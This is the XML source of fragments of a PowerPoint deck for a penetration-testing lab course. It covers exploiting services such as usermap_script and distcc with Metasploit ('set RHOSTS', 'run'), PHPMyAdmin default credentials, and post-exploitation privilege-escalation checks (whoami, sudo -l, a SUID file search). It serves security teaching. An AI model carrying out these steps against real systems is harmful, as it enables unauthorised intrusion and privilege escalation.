              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Tell Metasploit which computer to target: set RHOSTS [IP Address]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Launch the attack: run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380184095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0F64913-6B84-8A27-448A-DD13EBF407D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>After Breaking In:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="4400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs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94D4B8CA-77BB-2037-29B8-C21020B3D64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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1. Get Higher Access: Privilege Escalation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pP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Identify current user: </a:t>
            </a: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whoami</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Check for </a:t>
            </a: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sudo</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privileges: </a:t>
            </a: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sudo</a:t>
            </a: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 -l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Look for weak file permissions: find / -perm -4000 2&gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nul</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163723658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143</TotalTime>
  <Words>868</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>85</Paragraphs>
  <Slides>19</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Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>Söhne Mono</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Lab Exercise 4:</vt:lpstr>
      <vt:lpstr>Objective:</vt:lpstr>
      <vt:lpstr>usermap_script</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Steps:</vt:lpstr>
      <vt:lpstr>2. Use Metasploit to Exploit:</vt:lpstr>
      <vt:lpstr>After Breaking In: </vt:lpstr>
      <vt:lpstr>2. Look Around: Sensitive Info Hunting: </vt:lpstr>
      <vt:lpstr>Lab 5: Discovering PHPMyAdmin:</vt:lpstr>
      <vt:lpstr>Post-Exercise Questions:</vt:lpstr>
      <vt:lpstr>Lab Exercise 2: PHPMyAdmin Default Credentials</vt:lpstr>
      <vt:lpstr>distcc</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Lab Exercise 4:</dc:title>
  <dc:creator>Soumya S</dc:creator>
  <cp:lastModifiedBy>Soumya S</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-12T04:29:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-12T06:53:43Z</dcterms:modified>
</cp:coreProperties>
</file>